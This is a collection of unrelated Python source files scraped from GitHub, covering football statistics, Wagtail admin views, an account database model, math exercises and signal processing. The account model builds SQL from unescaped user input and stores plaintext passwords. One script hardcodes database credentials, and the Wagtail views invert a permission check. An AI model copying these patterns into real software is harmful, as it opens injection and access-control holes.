duration})\n\n\t\tprint(values)\n\t\tself.saveSegments(data)\n\n\tdef saveSegments(self, data):\n\t\tvideoName = data['videoName']\n\t\twith io.open('segmentFiles/' + str(videoName[0:videoName.index('.')]) + 'Segments.json', 'w') as outfile:\n\t\t\tjson.dump(data, outfile)\n","repo_name":"polypheny/Query-by-Gesture","sub_path":"Deepmime/API/Gesture-Recognition-with-3DRESNET/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"7539840798","text":"#!/usr/bin/python3\nimport logging\nimport pymysql\nfrom players import Player\n\nseason = '1617'\ndb = pymysql.connect (host=\"localhost\",\n user=\"player\",\n passwd=\"Tykes\",\n db=\"soccer\",\n autocommit = True\n )\n \nsky_team_names = {'Sheffield United':'SHEUTD','Manchester City':'MANCIT',\n 'Manchester United':'MANUTD','Oxford United':'OXFUTD','Leicester City':'LEICES',\n 'Stoke City':'STOKE','Tottenham Hotspur':'TOTTEN', 'West Bromwich Albion':'WESBRO',\n 'West Ham United':'WESHAM','Birmingham City':'BIRMIN','Blackburn Rovers':\n 'BLACKB','Burton Albion':'BURTON','Cardiff City':'CARDIF', 'Derby County':'DERBY',\n 'Huddersfield Town':'HUDDER','Ipswich Town':'IPSWIC','Leeds United':'LEEDS',\n 'Newcastle United':'NEWCAS','Norwich City':'NORWIC','Preston North End':'PRESTO',\n 'Queens Park Rangers':'QPR','Rotherham United':'ROTHER','Wigan Athletic':'WIGAN',\n 'AFC Wimbledon':'WIMBLE','Bolton Wanderers':'BOLTON','Bradford City':'BRADFO',\n 'Charlton Athletic':'CHARLT','Coventry City':'COVENT','Fleetwood Town':'FLEETW',\n 'Milton Keynes Dons':'MK DON','Northampton Town':'NORTHA','Oldham Athletic':'OLDHAM',\n 'Peterborough United':'PETERB','Scunthorpe United':'SCUNTH','Shrewsbury Town':'SHREWS',\n 'Southend United':'SOUTHE','Swindon Town':'SWINDO','Accrington Stanley':'ACCRIN',\n 'Barnet FC':'BARNET','Cambridge United':'CAMBRI','Carlisle United':'CARLIS',\n 'Cheltenham Town':'CHELTE','Colchester United':'COLCHE','Crawley Town':'CRAWLE',\n 'Crewe Alexandra':'CREWE','Exeter City':'EXETER','Grimsby Town':'GRIMSB',\n 'Hartlepool United':'HARTLE','Luton Town':'LUTON','Newport County':'NEWPOR',\n 'Plymouth Argyle':'PLYMOU','Wycombe Wanderers':'WYCOMB','Nottingham Forest':'NOTFOR',\n 'Notts County':'NOTCOU','Sheffield Wednesday':'SHEWED'}\n\ndef openDatabase():\n logging.debug('openDatabase')\n return db.cursor()\n\ndef readTeamNames(cur):\n logging.debug('readTeamName')\n cur.execute(\"Select * from TeamNames\")\n for row in cur.fetchall():\n print (row)\n \ndef findTeamCode(cur,team):\n logging.debug('findTeamCode for: ' + team)\n \n if team in sky_team_names:\n return sky_team_names[team]\n \n sql = \"SELECT `Code` FROM `TeamNames` where `Description` = %s\" \n try:\n cur.execute(sql, team)\n results = cur.fetchone()\n except pymysql.InternalError as error:\n logging.debug('findTeamCode Team ' + str(team) + error)\n \n return results[0]\n \ndef getFormations(cur, team):\n \n sql = \"SELECT `Formation`,`Opposition` FROM `MatchDaySquad` WHERE `Team` = %s\"\n try:\n cur.execute(sql, team)\n formation = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getFormations SQL failed for: ' + team + error)\n \n return formation\n \ndef getHomeResultsData(cur ,team, opposition):\n \n sql = \"SELECT `Score`,`result`, `date`, 'H' FROM `Results` WHERE `homeCode` = %s \\\n AND `awayCode` = %s\"\n try:\n cur.execute(sql, (team, opposition))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getHomeResultsData SQL failed for home: ' + team + error)\n \n return results\n \ndef getAwayResultsData(cur ,team, opposition):\n \n sql = \"SELECT `Score`,`result`, `date`, 'A' FROM `Results` WHERE `homeCode` = %s \\\n AND `awayCode` = %s\"\n try:\n cur.execute(sql, (opposition, team))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getAwayResultsData SQL failed for away: ' + team + error) \n resultsData.append(results)\n \n return result\n \ndef getHomeStatsData(cur ,team):\n\n sql = \"SELECT `homeGoals`,`homePossession`, `homeShots`, `homeShotsOnTarget`,`homeCorners` \\\n ,`homeFouls` ,`awayTeam` FROM `Stats` where `homeTeam` = %s\"\n try:\n cur.execute(sql, team)\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getHomeStatsData SQL failed for home: ' + team + error)\n \n return results\n \ndef getAwayStatsData(cur ,team):\n \n sql = \"SELECT `awayGoals`,`awayPossession`, `awayShots`, `awayShotsOnTarget`,`awayCorners` \\\n `awayFouls` `homeTeam` FROM `Stats` where 'awayTeam' = %s\"\n try:\n cur.execute(sql, (team))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getAwayStatsData SQL failed for away: ' + team+ error)\n resultsData.append(results)\n \n return result\n \ndef closeDatabase(cur): \n logging.debug('closeDatabase')\n db.close\n \nlogging.basicConfig(level = logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n \ncursor = openDatabase()\n \nteamFormation = getFormations(cursor, \"BARNSL\")\nprint(teamFormation[1][1])\nteamStats = getHomeStatsData(cursor, \"BARNSL\")\nprint(teamStats[1])","repo_name":"nicebeever/Football-Stats","sub_path":"footballTeam.py","file_name":"footballTeam.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73007191639","text":"from django.contrib.auth.models import Permission\nfrom wagtail.admin.forms.collections import collection_member_permission_formset_factory\nfrom wagtail.contrib.modeladmin.options import ModelAdmin\nfrom wagtail.contrib.modeladmin.views import \\\n CreateView as CreateViewModelAdmin, EditView as EditViewModelAdmin, IndexView as IndexViewModelAdmin\nfrom django.utils.translation import gettext as _\nfrom wagtail.core import hooks\nfrom wagtail.core.models import Collection\n\nfrom collectionmodeladmin.permissions import CollectionPermissionHelper\n\n\nclass IndexView(IndexViewModelAdmin):\n def get_queryset(self, request=None):\n user = self.request.user\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n if 'collection_id' in self.params and self.params.get('collection_id') == '':\n del self.params['collection_id']\n return super().get_queryset(request).filter(collection__in=collections)\n\n def get_context_data(self, **kwargs):\n user = self.request.user\n if user.is_active and user.is_authenticated and user.is_superuser:\n collections = Collection.objects.all()\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n\n context = {\n 'collections': collections\n }\n if 'collection_id' in self.params:\n current_collection = Collection.objects.get(id=self.params.get('collection_id'))\n context.update({'current_collection': current_collection})\n\n context.update(kwargs)\n\n return super().get_context_data(**context)\n\n\nclass CreateView(CreateViewModelAdmin):\n\n def get_form_class(self):\n form_class = super().get_form_class()\n user = self.request.user\n\n # If user is superuser then return form_class as is\n # Else filter the collections\n if user.is_active and user.is_authenticated and not user.is_superuser:\n return form_class\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n form_class.base_fields['collection'].queryset = collections\n form_class.base_fields['collection'].choices.queryset = collections\n return form_class\n\n\nclass EditView(EditViewModelAdmin):\n\n def get_form_class(self):\n form_class = super().get_form_class()\n user = self.request.user\n\n # If user is superuser then return form_class as is\n # Else filter the collections\n if user.is_active and user.is_authenticated and not user.is_superuser:\n return form_class\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n form_class.base_fields['collection'].queryset = collections\n form_class.base_fields['collection'].choices.queryset = collections\n return form_class\n\n\nclass CollectionModelAdmin(ModelAdmin):\n index_view_class = IndexView\n create_view_class = CreateView\n edit_view_class = EditView\n permission_helper_class = CollectionPermissionHelper\n index_template_name = 'collectionmodeladmin/index.html'\n\n def get_permissions_for_registration(self):\n return Permission.objects.none()\n\n\ndef collection_modeladmin_register(modeladmin_class):\n \"\"\"\n Method for registering CollectionModelAdmin or CollectionModelAdminGroup classes with Wagtail.\n \"\"\"\n instance = modeladmin_class()\n instance.register_with_wagtail()\n\n @hooks.register('register_group_permission_panel')\n def register_collection_model_permissions_panel():\n return collection_member_permission_formset_factory(\n modeladmin_class.model,\n [\n ('add_%s' % modeladmin_class.model._meta.model_name, _(\"Add\"), _(\"Add/edit %s you own\" % modeladmin_class.model._meta.verbose_name)),\n ('change_%s' % modeladmin_class.model._meta.model_name, _(\"Edit\"), _(\"Edit any %s\" % modeladmin_class.model._meta.verbose_name)),\n ],\n \"collectionmodeladmin/permissions/includes/collectionmodel_permissions_formset.html\"\n )\n\n return modeladmin_class\n","repo_name":"BabisK/wagtail-collectionmodeladmin","sub_path":"collectionmodeladmin/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1276186638","text":"from mysql.connector import errorcode\nfrom utils.mysql import Mysql\nfrom model.model_base import ModelBase\n\n\nclass AccountModel(ModelBase):\n\n # Get a user's unique ID by username.\n def find_id(self, user):\n db = self.get_db()\n hashid = self.gen_hashid(user)\n\n # Find user=id map from reversed finding table.\n query = f\"\"\"\n SELECT\n `userpair` \n FROM \n `find_user_id` \n WHERE \n `hashid`={hashid}\n \"\"\"\n row = db.fetchone(query, True)\n if not row:\n return 0\n\n userpair = row['userpair'].split(';')\n id = 0\n for pair in userpair:\n if pair == '':\n continue\n\n nameid = pair.split('=')\n # Found.query = f\"SHOW TABLES\"\n # row = db.fetchone(query, True)\n if nameid[0] == user:\n id = nameid[1]\n break\n\n return int(id)\n\n # Get a user's username by id.\n def get_user(self, id):\n db = self.get_db()\n\n table_name = self.get_account_table_name(id)\n query = f\"\"\"\n SELECT\n `user`\n FROM\n `{table_name}`\n WHERE\n `id`={id}\n \"\"\"\n row = db.fetchone(query)\n if not row:\n return False\n\n return row['user']\n\n # Get a user's password by id.\n def get_pwd(self, id):\n db = self.get_db()\n\n table_name = self.get_account_table_name(id)\n query = f\"\"\"\n SELECT\n `pwd`\n FROM\n `{table_name}`\n WHERE\n `id`={id}\n \"\"\"\n row = db.fetchone(query)\n if not row:\n return False\n\n return row['pwd']\n\n # Register a new user.\n def reg_user(self, user, pwd=''):\n db = self.get_db()\n\n table_name = ''\n idx = 0\n # Get current table name.\n for i in range(self.config.db_account_cur_table, self.config.db_account_max_table):\n idx = i\n table_name = f\"account{i+1:03}\"\n query = f\"\"\"\n SELECT\n max(`id`) as maxid\n FROM\n `{table_name}`\n \"\"\"\n row = db.fetchone(query)\n if not row or not row['maxid']:\n break\n count = int(row['maxid']) - i * self.config.db_account_per_table\n if count < self.config.db_account_per_table:\n break\n\n # Insert a new account item.\n query = f\"\"\"\n INSERT INTO `{table_name}`\n (`user`,`pwd`,`time`)\n VALUES\n ('{user}','{pwd}',{self.get_nowtime()})\n \"\"\"\n if not db.execute(query, True, True):\n # Insert failed.\n if db.last_errno != errorcode.ER_NO_SUCH_TABLE:\n return 0\n\n # Calculate auto_increment value.\n auto_increment = 10001\n if idx > 0:\n auto_increment = idx * self.config.db_account_per_table + 1\n\n # Create a new table.\n if not self.create_account_table(table_name, auto_increment):\n return 0\n if not db.execute(query, need_rowid=True):\n return 0\n\n id = db.last_rowid\n\n # Generate reversed finding info.\n hashid = self.gen_hashid(user)\n\n # Find user=id map from reversed finding table.\n query = f\"\"\"\n SELECT\n `userpair`\n FROM\n `find_user_id`\n WHERE\n `hashid`={hashid}\n \"\"\"\n row = db.fetchone(query, True)\n if row == False:\n if db.last_errno != errorcode.ER_NO_SUCH_TABLE:\n return 0\n # Try to create a new table.\n if not self.create_finduserid_table():\n return 0\n row = None\n\n if row is None: # hashid does not exist.\n userpair = f\"{user}={id};\"\n query = f\"\"\"\n INSERT INTO `find_user_id`\n (`hashid`,`userpair`)\n VALUES\n ({hashid},'{userpair}')\n \"\"\"\n if not db.execute(query):\n return 0\n else: # hashid exists.\n userpair = f\"{row['userpair']}{user}={id};\"\n query = f\"\"\"\n UPDATE\n `find_user_id`\n SET\n `userpair`='{userpair}'\n WHERE\n `hashid`={hashid}\n \"\"\"\n if not db.execute(query):\n return 0\n\n return int(id)\n\n # Create the 'accountXXX' table.\n def create_account_table(self, table_name, auto_increment=10001):\n db = self.get_db()\n query = f\"\"\"\n CREATE TABLE IF NOT EXISTS `{table_name}`(\n `id` INT NOT NULL AUTO_INCREMENT,\n `user` VARCHAR(255) NOT NULL,\n `pwd` VARCHAR(255) NOT NULL,\n `time` BIGINT NOT NULL,\n PRIMARY KEY(`id`),\n UNIQUE KEY(`user`)) AUTO_INCREMENT={auto_increment}\n \"\"\"\n return db.execute(query)\n\n # Create the 'find_user_id' table.\n def create_finduserid_table(self):\n db = self.get_db()\n query = f\"\"\"\n CREATE TABLE IF NOT EXISTS `find_user_id`(\n `hashid` INT NOT NULL,\n `userpair` TEXT NOT NULL,\n PRIMARY KEY(`hashid`))\n \"\"\"\n return db.execute(query)\n\n def get_account_table_name(self, id):\n # Hash to different table according to id.\n hashid = int(id / self.config.db_account_per_table + 1)\n return f\"account{hashid:03}\"\n\n def get_db(self):\n if 'account' not in self.cmd.db_cache:\n self.cmd.db_cache['account'] = Mysql(\n self.app,\n self.config.get_db_host('account'),\n self.config.get_db_port('account'),\n self.config.get_db_user('account'),\n self.config.get_db_pwd('account'),\n self.config.get_db_name('account'),\n )\n return self.cmd.db_cache['account']\n","repo_name":"py499372727/AgentSims","sub_path":"model/AccountModel.py","file_name":"AccountModel.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"85"} +{"seq_id":"69890400278","text":"\"\"\"\r\nWe shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once. For example, 2143 is a 4-digit pandigital and is also prime.\r\n\r\nWhat is the largest n-digit pandigital prime that exists?\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\n\r\ndef is_pandigital(number: int):\r\n number = str(number)\r\n return set(number) == set(str(i + 1) for i in range(len(number)))\r\n\r\n\r\ndef is_prime(number: int):\r\n if number < 2:\r\n return False\r\n for i in range(2, int(sqrt(number)) + 1):\r\n if number % i == 0:\r\n return False\r\n return True\r\n\r\n\r\n# every 9 digit and 8 digit pandigital number is divisible by 3.\r\nfor number in range(10000000, 0, -1):\r\n if is_pandigital(number) and is_prime(number):\r\n print(number)\r\n break\r\n","repo_name":"Siddhesh-Agarwal/Project-Euler","sub_path":"Project-Euler/Problem_041-050/Problem_041.py","file_name":"Problem_041.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5522362322","text":"def fibonacci():\n n = int(input(print(\"Which Fibonacci number do you want? \")))\n a = 0\n b = 1\n d = 47\n e = 46\n if n < d:\n for i in range(1, n):\n c = a\n a = b\n if i != e:\n b = b + c\n else:\n break\n n = str(n)\n b = str(b)\n\n print(\"Fibonacci # \" + n + \" is \" + b)\n else:\n print(\"ERROR: Answer does not fit in 32 bits\")\n\nfibonacci()","repo_name":"GameCzar485/Portfolio","sub_path":"IT310 - Data Structures & Algorithms/IT310/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15224433745","text":"import sys\nimport os\nimport math\nfrom os.path import join, dirname, isfile, abspath\nimport numpy as np\nfrom scipy.stats import t\nimport pandas as pd\nsys.path.insert(1, join(dirname(dirname(abspath(__file__))), 'utils'))\nfrom saving import save, clean_name\n\n\nN_DIMS = 6\nNOISE_STD = 0.1\n\n\ndef evaluate_hartmann6(X):\n try:\n X = np.array([X]).reshape(1, N_DIMS)\n except:\n raise ValueError(\n f'Did not provide the right format for X. Should be shape (1, {N_DIMS}) or ({N_DIMS}, ), got {X.shape}')\n\n def hartmann6_func(X):\n i = 0\n alpha = np.array([1.0, 1.2, 3.0, 3.2])\n A = np.array([[10, 3, 17, 3.5, 1.7, 8],\n [0.05, 10, 17, 0.1, 8, 14],\n [3, 3.5, 1.7, 10, 17, 8],\n [17, 8, 0.05, 10, 0.1, 14]])\n P = 1e-4 * np.array([[1312, 1696, 5569, 124, 8283, 5886],\n [2329, 4135, 8307, 3736, 1004, 9991],\n [2348, 1451, 3522, 2883, 3047, 6650],\n [4047, 8828, 8732, 5743, 1091, 381]])\n\n outer = 0\n for ii in range(4):\n inner = 0\n for jj in range(6):\n xj = X[i, jj]\n Aij = A[ii, jj]\n Pij = P[ii, jj]\n inner = inner + Aij*(xj-Pij)**2\n\n new = alpha[ii] * np.exp(-inner)\n outer = outer + new\n\n return np.array([outer])\n\n res = hartmann6_func(X)\n noisy_res = res + np.random.normal(0, NOISE_STD)\n\n return res[0], noisy_res[0]\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > N_DIMS + 3:\n raise IndexError(\n f'Too many arguments for the {N_DIMS}-dimensional benchmark')\n\n elif len(sys.argv) < N_DIMS + 3:\n raise IndexError(f'Too few arguments for the {N_DIMS}-dimensional benchmark')\n\n method = sys.argv[1]\n run_idx = sys.argv[2]\n if 'run_' not in run_idx:\n raise ValueError(\n 'Run index does not have the proper signature. Should follow the structure run_*index*.')\n\n idx = int(run_idx.replace('run_', ''))\n X = [float(arg) for arg in sys.argv[3:]]\n\n res, noisy_res = evaluate_hartmann6(X)\n save(X, noisy_res, res, clean_name(__file__), method, run_idx)\n\n sys.stdout.write(str(noisy_res) + '\\n')\n","repo_name":"hvarfner/JointEntropySearch","sub_path":"experiments/synthetic/hartmann6.py","file_name":"hartmann6.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"42712798681","text":"from files import *\nfrom obo_parser import *\n\nimport re\n\nclass GoLoader:\n\n\n @staticmethod\n def get_data():\n path = \"tmp\";\n S3File(\"mod-datadumps/data\", \"go.obo\", path).download()\n parsed_line = parseGOOBO(path + \"/go.obo\")\n dict_to_return = {}\n for line in parsed_line: # Convert parsed obo term into a schema-friendly AGR dictionary.\n go_id = line['id']\n dict_to_return[go_id] = {\n 'go_genes': [],\n 'go_species': [],\n 'name': line['name'],\n 'description': line['def'],\n 'go_type': line['namespace'],\n 'go_synonyms': line.get('synonym'),\n 'name_key': line['name'],\n 'id': go_id,\n 'href': 'http://amigo.geneontology.org/amigo/term/' + line['id'],\n 'category': 'go'\n }\n\n return dict_to_return\n","repo_name":"alliance-genome/agr_archive_initial_prototype","sub_path":"indexer/src/loaders/go_loader.py","file_name":"go_loader.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"22860813982","text":"import numpy as np\nprint(\"0\")\nimport pyqtgraph as pg\nprint(\"1\")\nfrom low_pass_filter import low_pass_filter2, createPlot\nprint(\"2\")\n\nn_data = 1000\ncut_freq = 80\naccuracy = 0.005\n\n\ndef oversampling_FFT(signal, n, m): #n - начальное m - конечное число отсчетов\n fft = np.fft.fft(signal)\n furie = np.zeros(m, dtype = complex)\n for i in range(n):\n furie[i] = fft[i]\n if(n%2) :\n half_n = int((n +1) / 2)\n for i in range (half_n+m-n+1,m ):\n furie[i] = furie[i-m+n]\n for i in range (half_n, half_n+m-n ):\n furie[i] = 0\n else:\n half_n = int(n/2)\n for i in range (half_n+m-n+2,m ):\n furie[i] = furie[i-m+n]\n furie[half_n+m-n+1] = furie[half_n+1]/2\n furie[half_n + 1] = furie[half_n+1]/2\n for i in range (half_n + 2, half_n+m-n ):\n furie[i] = 0\n res = np.fft.ifft(furie)\n res = res.real\n res = res * m/n\n return res\n\ndef decimation (signal, n, m): #n - начальное m - во сколько раз уменьшаем\n cut = int(n/m/2)\n data = low_pass_filter2(signal, cut)\n #data = low_freq_filter(signal, cut)\n res = np.zeros(int(n/m))\n j=0\n for i in range(0,n-m+1, m):\n res[j] = data[i]\n j+=1\n return res\n\ndef samplerating(signal, n, k=1, m=1): #n - начальное m - во сколько раз уменьшаем k - во сколько увеличиваем\n if(k/m>1):\n res = oversampling_FFT(signal, n, int(n*k/m))\n return res\n else:\n res = oversampling_FFT(signal, n, int(n*k))\n print(res.size)\n res = decimation(res, n*k, m)\n return res\n\nx = np.random.rand(n_data)\nfor i in range (n_data):\n x[i] += 10*np.sin(i/50)+5*np.sin(i*2)\n\n\n\nres = oversampling_FFT(x, n_data, n_data*2)\nres2 = decimation(x, n_data, 3)\nres3 = samplerating(x, n_data, 4, 1)\n\n\n\nx_ = [i for i in range(n_data)]\nx1 = [i for i in range(2 * n_data)]\nx2 = [i for i in range(n_data // 3)]\nx4 = [i for i in range(4 * n_data)]\n\ncreatePlot(x_, x, Name = \"original\")\ncreatePlot(x_, np.abs(np.fft.fft(x)), Name = \"1000\")\ncreatePlot(x1, np.abs(np.fft.fft(res)), Name=\"2000\")\ncreatePlot(x2, np.abs(np.fft.fft(res2)), Name=\"333\")\ncreatePlot(x4, np.abs(np.fft.fft(res3)), Name=\"4000\")\n\n\nif __name__ == '__main__':\n import sys\n if sys.flags.interactive != 1 or not hasattr(pg.QtCore, 'PYQT_VERSION'):\n pg.QtGui.QApplication.exec_()\n\n'''\naxes[0,0].plot(x)\naxes[1,0].plot(np.abs(np.fft.fft(x)))\n\n\naxes[0,1].plot(res)\naxes[1,1].plot(np.abs(np.fft.fft(res)))\n\naxes[0,2].plot(res2)\naxes[1,2].plot(np.abs(np.fft.fft(res2)))\n\naxes[0,3].plot(res3)\naxes[1,3].plot(np.abs(np.fft.fft(res3)))\n\nplt.show()\n\n\naxis = np.linspace(0, n_data, num = res3.size)\nplt.plot(axis, res3, 'bo')\nplt.plot(x, 'ro')\nplt.show()\n'''\n","repo_name":"mikhail-7975/Methods_Of_Signal_Processing","sub_path":"oversampling.py","file_name":"oversampling.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"46762577","text":"import os.path\r\n\r\nimport PyQt6.QtCore\r\nfrom PyQt6.QtGui import QPixmap\r\nfrom PyQt6.QtWidgets import QWidget, QGridLayout, QSpacerItem, QLabel, QVBoxLayout, QHBoxLayout\r\n\r\nfrom components.about_us_picture import AboutUsPicture\r\nfrom components.heading_label import HeadingLabel\r\nfrom components.paragraph_label import ParagraphLabel\r\n\r\n\r\nclass AboutUs(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.heading = HeadingLabel(\"About Us\")\r\n\r\n self.layout = QVBoxLayout(self)\r\n self.layout.setSpacing(16)\r\n self.layout.addWidget(self.heading)\r\n\r\n people = [\r\n (\"images:marie.jpg\",\r\n \"Marie Hessefort: I am an Electrical Engineering major at the University of Minnesota with a focus in Biomedical Engineering, Circuit Design, and Digital Signal Processing. \"),\r\n (\"images:henry.jpg\",\r\n \"Henry Hein: I am a Computer Engineering major at the University of Minnesota with a focus in Firmware and Digital Logic Design\"),\r\n (\r\n \"images:michael.jpg\",\r\n \"Michael Johnson: I am a Computer Engineering major at the University of Minnesota.\"),\r\n (\"images:jacob.jpg\",\r\n \"Jacob Medchill: I am a Computer Engineering major at the University of Minnesota with a focus on embedded systems.\"),\r\n (\"images:garrett.png\",\r\n \"Garrett Udstrand: I am a Computer Engineering major at the University of Minnesota with a focus in Application Development and AI.\"),\r\n (\"images:Sobelman.jpg\",\r\n \"Gerald Sobelman: Project Sponsor and Professor, Department of Electrical and Computer Engineering. Learn more about my research at: https://cse.umn.edu/ece/gerald-sobelman\")\r\n ]\r\n\r\n self.layout.addWidget(ParagraphLabel(\r\n \"We created this application to allow users of all levels to improve their knowledge of ECGs and their ability to read an ECG strip and Identify different arrhythmias.\"))\r\n\r\n for image, name, in people:\r\n horizontal_layout = QHBoxLayout()\r\n horizontal_layout.setSpacing(30)\r\n horizontal_layout.addWidget(AboutUsPicture(image))\r\n horizontal_layout.addWidget(ParagraphLabel(name))\r\n self.layout.addLayout(horizontal_layout)\r\n\r\n self.layout.addSpacerItem(QSpacerItem(1, 1, PyQt6.QtWidgets.QSizePolicy.Policy.Expanding,\r\n PyQt6.QtWidgets.QSizePolicy.Policy.Expanding))\r\n","repo_name":"GarrettU27/ETTP","sub_path":"pages/about_us.py","file_name":"about_us.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18755131539","text":"import json\nimport datetime\nimport pickle\nimport os\n\nhierarchy = [\n {\n \"id\": 0,\n \"name\": \"Marketing\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 1,\n \"name\": \"IT\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 2,\n \"name\": \"Finance\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n }, {\n \"id\": 3,\n \"name\": \"HR\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 4,\n \"name\": \"Operations\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 5,\n \"name\": \"Executives\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"cob\": 1,\n \"ceo\": 2,\n \"coo\": 3,\n \"cfo\": 4,\n \"chro\": 5,\n \"cmo\": 6,\n \"cio\": 7,\n }\n }\n]\n\n# for i in range(0,len(hierarchy)):\n# if(i==0):\n# with open(\"data\\marketing.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[0]))\n# elif(i==1):\n# with open(\"data\\it.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[1]))\n# elif(i==2):\n# with open(\"data/finance.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[2]))\n# elif(i==3):\n# with open(\"data\\hr.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[3]))\n# if(i==4):\n# with open(\"data\\operations.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[4]))\n# if(i==5):\n# with open(\"data\\executives.txt\",\"w\") as f:\n# f.write(json.dumps(hierarchy[5]))\n\n\nclass Employee:\n def __init__(self, id, name, dob, email, pos, salary, dep):\n self.id = id\n self.name = name\n self.dob = dob\n self.email = email\n self.pos = pos\n self.salary = salary\n self.dep = dep\n\n def find(lst, key, value):\n for i, dic in enumerate(lst):\n if dic[key] == value:\n return i\n return -1\n\n def setDob():\n dayFlag = True\n while(dayFlag):\n dayInput = int(input(\"Enter the student's day of birth: \"))\n if(isinstance(int(dayInput), int)):\n if(int(dayInput) < 32 and int(dayInput) > 0):\n dayFlag = False\n else:\n print(\"Entred day was invalid. Please try again.\")\n else:\n print(\"Entred day was invalid. Please try again.\")\n monthFlag = True\n while(monthFlag):\n monthInput = int(input(\"Enter the student's month of birth: \"))\n if(isinstance(int(monthInput), int)):\n if(int(monthInput) == 2 and int(dayInput) > 29):\n print(\"Entered month was invalid. Please try again\")\n elif(int(monthInput) < 13 and int(monthInput) > 0):\n monthFlag = False\n else:\n print(\"Entered month was invalid. Please try again\")\n yearFlag = True\n while(yearFlag):\n yearInput = int(input(\"Enter student's year of birth: \"))\n if(isinstance((yearInput), int)):\n if(yearInput < 1900 or yearInput > int(datetime.datetime.now().strftime(\"%Y\"))-18):\n print(\"Enter year was invalid. Please try again.\")\n else:\n yearFlag = False\n returnedValue = str(dayInput)+\"/\"+str(monthInput)+\"/\"+str(yearInput)\n return returnedValue\n\n def getSalary(dep, pos):\n with open(\"data/depData/\"+dep.lower()+\".txt\", \"r\") as f:\n data = json.loads(f.read())\n return data[\"salaryRate\"][pos.lower()]\n\n def setNewDob(self):\n newDob = Employee.setDob()\n self.dob = newDob\n \n def initName(self):\n while True:\n firstName = input(\"Enter first name: \")\n if(firstName.isalpha()):\n break\n else:\n print(\"Invalid input. Please try again\")\n while True:\n lastName = input(\"Enter last name: \")\n if(firstName.isalpha()):\n break\n else:\n print(\"Invalid input. Please try again\")\n fullName = firstName + \" \" + lastName\n return fullName\n\n def setSalary(self):\n Employee.getSalary(self.dep, self.pos)\n\ns1 = \"\"\nprint(s1.isalpha())\n","repo_name":"ntquanghai/HrManagementSystem","sub_path":"domains/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22534360962","text":"from src.instance_parser import get_CGLSP_instance_cost_matrix\nimport numpy as np\nimport time\n\n\ndef brute_force_AP_solver(cost_matrix):\n\n start_time = time.time()\n\n print(\"Solving Assignment Problem using Brute Force \\n\")\n\n print(\"Cost Matrix: \\n\", cost_matrix, \"\\n\")\n\n # generate all feasible solutions\n feasible_sols = generate_feasible_solutions(cost_matrix)\n\n # find the min cost feasbile solution\n if feasible_sols:\n\n print(\"Finding feasible solution with min cost: \")\n\n min_cost = np.inf\n best_sol = []\n best_assignment_costs = []\n for i, sol in enumerate(feasible_sols):\n cost, 